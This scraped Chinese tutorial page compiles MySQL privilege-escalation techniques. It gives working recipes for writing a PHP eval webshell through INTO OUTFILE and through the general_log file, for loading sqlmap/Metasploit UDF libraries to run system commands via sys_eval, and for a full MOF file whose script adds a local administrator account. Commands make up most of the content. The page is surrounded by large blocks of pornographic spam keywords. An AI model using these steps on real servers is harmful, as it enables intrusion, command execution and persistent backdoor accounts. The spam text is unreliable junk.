婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Mysql提權的多種姿勢匯總

Mysql提權的多種姿勢匯總

熱門標簽:大眾點評星級酒店地圖標注 高清地圖標注道路 話務外呼系統怎么樣 外東北地圖標注 臨清電話機器人 400電話可以辦理嗎 拉卡拉外呼系統 云南電商智能外呼系統價格 智能外呼系統復位

一、寫入Webshell

into outfile 寫shell

前提條件:

1、知道網站物理路徑

2、高權限數據庫用戶

3、load_file() 開啟 即 secure_file_priv 無限制

4、網站路徑有寫入權限

首先基礎語法查詢是否 secure_file_priv 沒有限制

show global variables like '%secure_file_priv%';

value 說明
NULL 不允許導入或導出
/var 只允許在/var目錄導入導出
不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認是空,這個情況下可以向任意絕對路徑寫文件

在 MySQL 5.5之后 secure_file_priv 默認是 NULL,這個情況下不可以寫文件

如果滿足上述所有條件的話,那么可以嘗試使用下面的 SQL 語句來直接寫 shell:

select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';

查看目標路徑下,已寫入shell.php文件

上菜刀連接

日志文件寫shell

前提條件:

1、Web 文件夾寬松權限可以寫入

2、Windows 系統下

3、高權限運行 MySQL 或者 Apache

MySQL 5.0 版本以上會創建日志文件,可以通過修改日志的全局變量來 getshell

查看日志目錄

SHOW VARIABLES LIKE 'general%';

general_log 默認關閉,開啟它可以記錄用戶輸入的每條命令,會把其保存在對應的日志文件中。
可以嘗試自定義日志文件,并向日志文件里面寫入內容的話,那么就可以成功 getshell:

更改日志文件位置

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

查看當前日志配置

目標目錄下查看,寫入了log.php文件

寫入shell

select '?php @eval($_POST[cmd]); ?>'

上菜刀,連接


二、UDF提權

自定義函數,是數據庫功能的一種擴展。用戶通過自定義函數可以實現在 MySQL 中無法方便實現的功能,其添加的新函數都可以在SQL語句中調用,就像調用本機函數 version() 等方便。

動態鏈接庫

如果是 MySQL >= 5.1 的版本,必須把 UDF 的動態鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創建自定義函數。

那么動態鏈接庫文件去哪里找呢?實際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對應系統的動態鏈接庫文件。

sqlmap的UDF動態鏈接庫文件位置

sqlmap根目錄/data/udf/mysql

不過 sqlmap 中 自帶這些動態鏈接庫為了防止被誤殺都經過編碼處理過,不能被直接使用。不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ,

解碼方法如下:

解碼32位的windows動態鏈接庫:

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

其他linux和windows動態鏈接庫解碼類似

或者直接使用metasploit自帶的動態鏈接庫,無需解碼

Metasploit的UDF動態鏈接庫文件位置

接下來的任務是把 UDF 的動態鏈接庫文件放到 MySQL 的插件目錄下,這個目錄改如何去尋找呢?可以使用如下的 SQL 語句來查詢:

show variables like '%plugin%'


寫入動態鏈接庫

當 secure_file_priv 無限制的時候,我們可以手工寫文件到 plugin 目錄下的

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll')  into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

創建自定義函數并調用命令

創建自定義函數

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否新增了sys_eval

接著就可以通過創建的這個函數來執行系統命令了:

刪除自定義函數

drop function sys_eval;

三、MOF提權

mof提權原理

關于 mof 提權的原理其實很簡單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鐘都會在一個特定的時間去執行一次的特性,來寫入我們的cmd命令使其被帶入執行。

嚴苛的前提條件:

1.windows 03及以下版本

2.mysql啟動身份具有權限去讀寫c:/windows/system32/wbem/mof目錄

3.secure-file-priv參數不為null

提權過程:

MOF文件每五秒就會執行,而且是系統權限,我們通過mysql使用load_file 將文件寫入/wbme/mof,然后系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs腳本,我們可以通過控制這段vbs腳本的內容讓系統執行命令,進行提權。

利用代碼如下(test.mof):

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF文件利用:

將上面的腳本上傳到有讀寫權限的目錄下:

這里我上傳到了C:\soft\,我們使用sql語句將文件導入到c:/windows/system32/wbem/mof/下

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

驗證提權:

當我們成功把mof導出時,mof就會直接被執行,且5秒創建一次用戶。

關于MOF提權弊端

我們提權成功后,就算被刪號,mof也會在五秒內將原賬號重建,那么這給我們退出測試造成了很大的困擾,所以謹慎使用。那么我們如何刪掉我們的入侵賬號呢?

cmd 下運行下面語句:

#停止winmgmt服務
net stop winmgmt

#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\


# 手動刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S

# 刪除創建的用戶
net user hpdoger /delete

#重啟服務
net start winmgmt

總結

到此這篇關于Mysql提權姿勢的文章就介紹到這了,更多相關Mysql提權姿勢內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Linux利用UDF庫實現Mysql提權
  • Mysql提權方法利用
  • 提權,以MySQL之名

標簽:山西 溫州 揚州 三明 福州 阿里 無錫 定西

巨人網絡通訊聲明:本文標題《Mysql提權的多種姿勢匯總》,本文關鍵詞  Mysql,提權,的,多種,姿勢,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Mysql提權的多種姿勢匯總》相關的同類信息!
  • 本頁收集關于Mysql提權的多種姿勢匯總的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    国产午夜三级一区二区三| 免费久久99精品国产| 日韩和欧美一区二区三区| 欧洲视频一区二区| 一区二区日韩电影| 欧美精品三级在线观看| 精品一区精品二区高清| 国产欧美日韩一区二区三区在线观看| 久久99久久99精品免视看婷婷 | 欧美日韩一区二区三区不卡| 日韩欧美综合一区| 亚洲视频免费在线观看| 国产欧美一区二区精品性色超碰| 国产麻豆一精品一av一免费| 欧美一级淫片007| 成人午夜电影网站| 成人免费毛片高清视频| 在线电影国产精品| 日韩精品专区在线影院观看| 日韩一区二区麻豆国产| 九九精品一区二区| 成人夜色视频网站在线观看| 欧美日韩国产免费| 亚洲同性同志一二三专区| 不卡的av电影| 日韩精品最新网址| 国产精品一区二区男女羞羞无遮挡 | 色欧美片视频在线观看在线视频| 亚洲三级在线免费| 国产精品萝li| 亚洲电影一区二区| 成人激情开心网| 91精品国产91久久综合桃花| 国产精品久线在线观看| 偷拍日韩校园综合在线| 国产精品一二三在| 337p日本欧洲亚洲大胆色噜噜| 国产精品成人免费精品自在线观看| 亚洲欧美激情视频在线观看一区二区三区 | 欧美精品一区男女天堂| 亚洲欧美综合另类在线卡通| 日韩电影免费在线看| 懂色av一区二区夜夜嗨| 色综合天天综合在线视频| 国产精品超碰97尤物18| 亚洲美女屁股眼交| 久久99精品一区二区三区三区| av在线一区二区| 久久婷婷国产综合国色天香| 亚洲成人免费在线| www.成人在线| 亚洲精品成人天堂一二三| 免费成人你懂的| 色琪琪一区二区三区亚洲区| 国产亚洲一区二区在线观看| 日韩av电影免费观看高清完整版在线观看 | 亚洲日本在线天堂| 久久99日本精品| 欧美日韩国产一级| 亚洲欧美日韩电影| 国产999精品久久久久久绿帽| 色婷婷激情一区二区三区| 久久亚洲欧美国产精品乐播| 日本欧美肥老太交大片| 91官网在线观看| 久久综合久久综合久久综合| 国产精品一线二线三线精华| 日韩午夜在线观看| 日韩黄色小视频| 欧美影院一区二区| 亚洲在线免费播放| 在线观看日韩电影| 亚洲色图清纯唯美| av高清不卡在线| 国产精品妹子av| 成人高清视频免费观看| 久久久一区二区三区| 狠狠色综合播放一区二区| 欧美一级二级三级蜜桃| 久久精品国产免费| 日韩欧美一区二区不卡| 免费成人在线影院| 欧美网站大全在线观看| 激情欧美日韩一区二区| 欧美日韩在线不卡| 久久se这里有精品| 久久午夜老司机| 国产成人午夜精品影院观看视频| 久久精品人人做人人爽97| 成人手机在线视频| 欧美一区在线视频| 成人涩涩免费视频| 国产精品理论片在线观看| 色综合咪咪久久| 天天色图综合网| 欧美电影免费观看完整版| 国产资源在线一区| 久久久久久久免费视频了| 成人av电影在线网| 亚洲一区二区三区四区在线免费观看 | 久久99精品国产.久久久久| 精品国产123| 国产福利视频一区二区三区| 中文字幕一区二区三区不卡| 日本国产一区二区| 蜜臀久久99精品久久久久宅男 | 中文字幕一区免费在线观看| 色999日韩国产欧美一区二区| 午夜精品久久久久| 亚洲精品在线免费观看视频| 99久久国产免费看| 亚洲大片在线观看| 久久婷婷综合激情| 欧美午夜精品电影| 久久国产三级精品| 一区二区三区免费观看| 日韩欧美国产一区二区在线播放| 麻豆精品视频在线观看| 国产精品视频线看| 欧美一区二区女人| 成人不卡免费av| 日本欧美久久久久免费播放网| 久久网这里都是精品| 色av成人天堂桃色av| 日本亚洲电影天堂| 日韩你懂的在线播放| 99国产一区二区三精品乱码| 蜜臀久久久99精品久久久久久| 亚洲婷婷综合色高清在线| 全部av―极品视觉盛宴亚洲| 午夜精品福利一区二区三区av | 欧美视频在线观看一区| 国产.精品.日韩.另类.中文.在线.播放| 国产精品电影院| 欧美精品一区二区三区视频| 欧美三级中文字| 91久久精品网| 91蝌蚪国产九色| 99久久99久久久精品齐齐| 成人听书哪个软件好| 日韩av一区二区三区四区| 日韩高清不卡一区二区| 欧美日韩亚洲国产综合| 亚洲成人av资源| 26uuu欧美日本| 99riav久久精品riav| 裸体歌舞表演一区二区| 亚洲美女在线一区| 中文字幕不卡在线观看| 在线亚洲一区二区| 狠狠色丁香久久婷婷综合丁香| 亚洲综合清纯丝袜自拍| 亚洲欧洲另类国产综合| 国产欧美日韩激情| 欧美电影免费观看高清完整版在线观看 | 亚洲在线视频网站| 最新国产精品久久精品| 国产日韩综合av| 久久尤物电影视频在线观看| 日韩三级中文字幕| 欧美一区二区性放荡片| 欧美日本高清视频在线观看| 欧美午夜一区二区| 成人精品亚洲人成在线| 一区二区理论电影在线观看| 国产亚洲一区二区三区四区 | 精品欧美一区二区久久| 欧美一级精品大片| 91精品国产乱码| 欧美一区二区三区婷婷月色| 欧美性猛交xxxx乱大交退制版| 色婷婷久久久久swag精品| 色94色欧美sute亚洲13| 91久久精品一区二区三区| 一本久道中文字幕精品亚洲嫩| 99免费精品在线观看| 色一区在线观看| 欧美日韩国产影片| 日韩写真欧美这视频| 欧美一级片在线看| 久久综合久久综合久久综合| 日韩一级高清毛片| 亚洲精品菠萝久久久久久久| 亚洲图片欧美一区| 日韩精品电影在线| 精品在线播放午夜| 亚洲精品在线三区| 欧美一区三区二区| 精品少妇一区二区三区视频免付费 | www.66久久| 国产精品一区二区不卡| 伦理电影国产精品| 久久精品国产免费| 国产精品亚洲午夜一区二区三区| 国产精品18久久久久久久久| 不卡av免费在线观看| 欧美日韩高清一区二区三区| 精品国产91亚洲一区二区三区婷婷| 国产精品美女视频| 天堂成人免费av电影一区|